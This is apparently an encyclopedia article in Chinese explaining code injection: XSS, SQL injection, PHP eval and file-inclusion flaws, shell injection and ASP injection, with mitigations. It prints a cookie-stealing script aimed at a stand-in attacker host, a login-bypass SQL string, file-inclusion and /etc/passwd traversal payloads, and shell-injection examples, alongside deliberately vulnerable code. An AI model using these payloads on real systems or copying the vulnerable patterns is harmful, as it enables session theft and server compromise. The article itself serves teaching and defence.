代码注入

举例说，有一间公司的网页服务器上有一个签名簿的代码，用来让用户发表简短的口信，例如：

Nice site!

不过，这个代码原来有跨网站脚本漏洞。一个意图入侵者得悉这间公司采用了有问题的代码，于是试图透过留下一条附带有代码的口信，例如：

Nice Site,  I think I'll take it.><script>document.location='http://some_attacker/cookie.cgi?' +document.cookie</script>

如果另一个用户查看了该页，被注入的代码即执行。该代码可让攻击者扮装成另一个用户。然而这个相同的软件臭虫可被用户意外的触发，亦即造成该网站暴露 HTML 代码。

That post was awesome, :>)

在这个案例里表情符号可造成 HTML 代码不对称，因为不对称的HTML标签被注入到代码里。

大部分这类的问题与哪些可能输入资料，或者特殊资料效果的错误假设相关。一些软件开发员可能犯下危险假设的经典示例如下：

• 假设某程序接口使用的元字符永远不会在输入中出现；例如假设英文半角标点符号如引号或者半括弧永不出现。
• 假设只有阿拉伯数字字符会当成输入键入。
• 假设输入永远不会超过固定字段大小。
• 假设阿拉伯数字只会相等或少于上限。
• 假设阿拉伯数字只会相等或大于下限。
• 假设客户端原本服务端提供的默认值 (例如窗体的隐藏字段或者cookie) 无法于客户端被用户修改。这种假设忽略了众所皆知的攻击如cookie下毒：在此cookie值被恶意用户强制设置。
• 假设从输入端获取指针或者数组索引不会出问题。
• 假设输入端永远不会提供关于它自己或者其他相关值的虚假信息，例如文件大小^[1]

代码注入的使用一般被视为心怀恶意的举动，而它确实常常如此。透过代码注入技术在黑或者破解系统上，以获取信息、提权、或者非法访问某系统是相当流行的。

恶意用途的代码注入可包括：

• 透过SQL注入(见下文)随意修改数据库中的值。影响所及可从某网站外观损毁，到对敏感资料严重的破坏。
• 当用户拜访恶意网站时，透过网页浏览器或其插件的漏洞安全隐患，进行代码注入，以便安装流氓软件到用户机器上。
• 透过PHP或者ASP注入安装流氓软件或者执行恶意代码于服务端。
• 于UNIX系统利用Shell注入安全隐患对setuid root（英语：Setuid）二进制资料作修改，达成提权到root使用权限的目的。
• 于视窗系统利用Shell注入安全隐患对系统服务做手脚，达成提权到本地端系统使用权限的目的。
• 从网页浏览器利用HTML/脚本注入(跨网站脚本)进行连线窃取 / cookies窃取进而冒充他人，获取他人个人敏感资料。

某些人可能会出于善意而使用代码注入。例如，透过代码注入以改变或者调试某程序或者系统的行为可以“摆弄”系统以某种方式表现其行为而不怀任何恶意。打比方说：

• 代码注入可以添入某原本搜索结果页面设计上没有的字段，方便用户。
• 透过对原本设计默认函数没有曝光的字段赋值，代码注入可提供一个全新的方式来过滤、排序、或者归类资料。

这些人诉诸此种替代手段大致是下面几种原因之一：

• 对软件中希望改进函数进行润饰的其他方法证明不可能，或者
• 其他对软件修改的方式代价过高，或者
• 其他对软件修改的方式过度艰苦。

一般开发社群对以此为目的的代码注入不表欢迎。他们称这种行为为三脚猫、半调子、或者骇 / 黑程序。(kludge or hack)

某些开发者允许或者甚至表扬代码注入的使用来“加强”他们的软件；通常是因为该方案提供了较不昂贵的方式来实现新的或者特殊化的功能。不幸的是，其副作用与无法列管的蕴含式可能相当危险。

一般来说，即使相当善意的代码注入使用都不被建议使用。

某些用户可能会不经意进行代码注入，因为他们对程序提供的输入，没列在当初开发系统者的考虑中。例如：

• 用户可能视某个包含表示字符或者字符字符串为合法输入，而不知该字符被开发者所保留而有特殊意义（像“张三 & 李四”里的“&”字符，或者英文约翰的 M&M 巧克力：“John's M&M's”里的单引号)。

• 用户可能会提交格式错乱的文件做为输入。这种行为对单一程序没什么问题，但可能对整个接收系统是灾难。

要避免代码注入的种种问题，得充分发挥输入输出处理保全，例如：

• 输入确认。
• 更换危险字符。例如在PHP透过addslashes()函数保护SQL注入。
• 输入编码。
• 输出编码。
• 采用其他没有饱受代码注入漏洞困扰的编程实现，例如“参数化SQL查询” ("parameterized SQL queries" 又名 "prepared statements" 亦有时称 "bind variables") 。

SQL注入是种乘SQL语法之利，注入可读取或者修改数据库、或者扭曲原始查询意义的命令。

以一个网页有两个字段让用户输入用户名与密码为例，在该网页幕后工作的代码会产生SQL查询以检查密码是否与用户名密码列表相符：

SELECT UserList.Username
FROM UserList
WHERE UserList.Username = 'Username'
AND UserList.Password = 'Password'

如果这查询有回应行数，便允许该访问。然而，如果恶意用户键入合法用户名，并且在密码栏注入某些合法代码 ("password' OR '1'='1")，查询结果便如下所示：

SELECT UserList.Username
FROM UserList
WHERE UserList.Username = 'Username'
AND UserList.Password = 'password' OR '1'='1'

在上面示例里，"Password"被假定为空白或者某个无害的字符串。"'1'='1'"逻辑式将永远为真，并且找到多少行就回应多少行，因此访问就被允许了。

该技术可被精练成允许执行多重陈述，甚或加载外部程序。

"PHP注入"、"ASP注入"、以及其他类似技术术语是创造来泛指其他种种允许攻击者直接对服务器脚本引擎提供代码的代码注入攻击。在"PHP注入"实例里，服务端脚本引擎是PHP。

实际上，PHP注入是“动态赋值安全隐患”、“包含文件注入”、或者类似代码注入的安全隐患。

mitre.org（页面存档备份，存于互联网档案馆）的史蒂芬克利斯第 (Steven M. Christey)提议以这个名字作为这类型的代码注入安全隐患。

eval注入安全隐患发生在攻击者可控制所有或者部分作为“喂”给eval()函数调用的输入字符串。^[2]

$myvar = 'somevalue'; 
$x = $_GET['arg']; 
eval('$myvar = ' . $x . ';');

"eval"的参数将会视同PHP处理，所以额外的命令可被添加。例如：如果"arg"如果被设成"10; system('/bin/echo uh-oh')"，后面的"system('/bin/echo uh-oh')"代码将被执行，这等同在服务器上执行开发者意料外的程序。在这示例里头是"/bin/echo"。

如在"Dynamic Evaluation Vulnerabilities in PHP applications"一文所定义的： PHP支持 "变量的变量"，意指变量或者表达式可以对其他变量名赋值。这种特性可用来于程序执行时期动态改变哪个变量被访问或给值。这种特性是把双刃剑：强大、便利、同时也很危险。

许多程序有下面类似代码：

$safevar = "0"; 
$param1 = ""; 
$param2 = ""; 
$param3 = ""; 
# my own "register globals" for param[1,2,3] 
foreach ($_GET as $key => $value) { 
  $$key = $value; 
}

如果攻击者在查询字符串中给定"safevar=bad"，那$safevar将会被设为值 "bad"。

下面PHP示例将按照请求的方式执行函数。

$myfunc = $_GET['myfunc']; 
$myfunc();

以及：

$myfunc = $_GET['myfunc']; 
${"myfunc"}();

考虑下面的PHP程序(这里包含了个文件可因应需求改变)：

<?php
   $color = 'blue';
   if (__isset( $_GET['COLOR'] ) )
      $color = $_GET['COLOR'];
   require( $color . '.php' );
?>

<form method="get">
   <select name="COLOR">
      <option value="red">red</option>
      <option value="blue">blue</option>
   </select>
   <input type="submit">
</form>

开发者认为这样大概可以保证只有 blue.php 和 red.php 可被加载。不过随着任何人可在COLOR轻易的插入随意值，造成以下文件注入的可能性：

• /vulnerable.php?COLOR=http://evil/exploit? - 注入远程机器上有漏洞的文件。
• /vulnerable.php?COLOR=C:\\ftp\\upload\\exploit - 从一个已经上传、叫做exploit.php文件运行其代码。
• /vulnerable.php?COLOR=../../../../../../../../etc/passwd%00 - 让攻击者获取该UNIX系统目录检索下密码文件的内容。
• /vulnerable.php?COLOR=C:\\notes.txt%00 - 一个使用空元字符以解除.php扩展名限制，允许访问其他非 .php 结尾文件。 (PHP默认值"magic_quotes_gpc = On"可以终止这种攻击)

Shell注入又称命令行界面注入，它命名源于Unix Shell，不过可套用到大部分允许软件程序化地执行命令行接口的系统上。常见的Shell注入资源有system()、StartProcess()、java.lang.Runtime.exec()、System.Diagnostics.Process.Start()以及类似的应用程序接口。

考虑下面的简短PHP程序。它执行一段叫做funnytext的外部程序，以置换用户提交的许多其他单字：

<?php
passthru ( " /home/user/phpguru/funnytext " 
           . $_GET['USER_INPUT'] );
?>

该程序可以以多种方式被注入：

• `命令` 将会执行 命令.
• $(命令) 将会执行 命令.
• ; 命令 将会执行 命令，并输出命令的结果。
• | 命令 将会执行 命令，并输出命令的结果。
• && 命令 将会执行 命令，并输出命令的结果。
• || 命令 将会执行 命令，并输出命令的结果。
• > /home/user/phpguru/.bashrc 将会改写文件 .bashrc.
• < /home/user/phpguru/.bashrc 将会将文件 .bashrc 提交，当成是 funnytext 的输入。

注：命令指的是命令行接口下可供输入执行的命令，例如视窗平台的 dir、UNIX 平台的 ls 等等。

PHP提供escapeshellarg()和escapeshellcmd()以在调用方法以前进行编码。然而，实际上并不建议相信这些方法是安全的 - 同样必须对输入确认 / 消毒。

HTML注入/脚本注入是个炒得相当热的话题，一般专业术语为跨网站脚本（Cross-site scripting，通常简称为XSS）。XSS指的是一种依靠用户输入到网页脚本，或者某些像代码行被置于输出HTML，而没有检查HTML代码或脚本的注入漏洞。

这种注入有两个基本型如下：

主动式 (型 1)

这种类型的XSS漏洞比较不危险，因为用户输入被置于动态产生的网页。服务端没有任何改变。

被动式 (型 2)

这种类型比较危险，因为输入是写在静态网页上，故威胁是持续性的。

根据英国技术网站The Register的^[3]文献指出，HTML注入亦可发生在用户本身被有问题的DLL感染过的系统身上。该文献引用罗杰汤森 (Roger Thompson) 的说法：受害者的浏览器，实际上，访问了PayPal或其他类似的网站，甚或某动态链接文件将它自己插入IE，并试着在交易进行中读取并修改HTML。该文献提及使用这种手段的钓鱼攻击顺利规避IE7与赛门铁克尝试侦测可疑网站的努力。

"ASP注入"、"PHP注入"、以及其他类似技术术语是创造来泛指其他种种允许攻击者直接对服务器脚本引擎提供代码的代码注入攻击。在"ASP注入"实例里，服务端脚本引擎是微软Active Server Pages，一种微软IIS的外加组件。

在实际上与PHP相似，ASP注入也是“动态赋值安全隐患”、“包含文件注入”、或者类似代码注入的安全隐患。

示例：

<%
    If Not IsEmpty(Request( "username" ) ) Then
        Const ForReading = 1, ForWriting = 2, ForAppending = 8
        Dim fso, f
        Set fso = CreateObject("Scripting.FileSystemObject")
        Set f = fso.OpenTextFile(Server.MapPath( "userlog.txt" ), ForAppending, True)
        f.Write Request("username") & vbCrLf
        f.close
        Set f = nothing
        Set fso = Nothing
        %>
         <h1>List of logged users:</h1>
         <pre>
        <%
         Server.Execute( "userlog.txt" )
        %>
         </pre>
        <%
    Else
        %>
         <form>
         <input name="username" /><input type="submit" name="submit" />
         </form>
        <%
    End If
%>

在这个示例中，用户可用命令而非用户名取代输入。

• 调试
• 恶意程序：木马程序

• Article "The Cross-site Scripting FAQ（页面存档备份，存于互联网档案馆）" By Robert CGISecurity.com
• Article "Three Ways to Inject Your Code into Another Process" by Robert Kuster
• Article "Inject your code to a Portable Executable file" by A. Danehkar
• Article "Injective Code inside Import Table" by A. Danehkar
• Article "Defending against Injection Attacks through Context-Sensitive String Evaluation (CSSE)" by Tadeusz Pietraszek and Chris Vanden Berghe
• News article "Flux spreads wider" - First Trojan horse to make use of code injection to prevent detection from a firewall
• The Daily WTF（页面存档备份，存于互联网档案馆） regularly reports real-world incidences of susceptibility to code injection in software.
• Known code injection vulnerabilities since 2001 by Armorize Technologies

• N-Stalker Web Application Security Scanner（页面存档备份，存于互联网档案馆）
• Sandcat（页面存档备份，存于互联网档案馆）
• Web Vulnerability Scanner（页面存档备份，存于互联网档案馆）
• Maui Security Scanner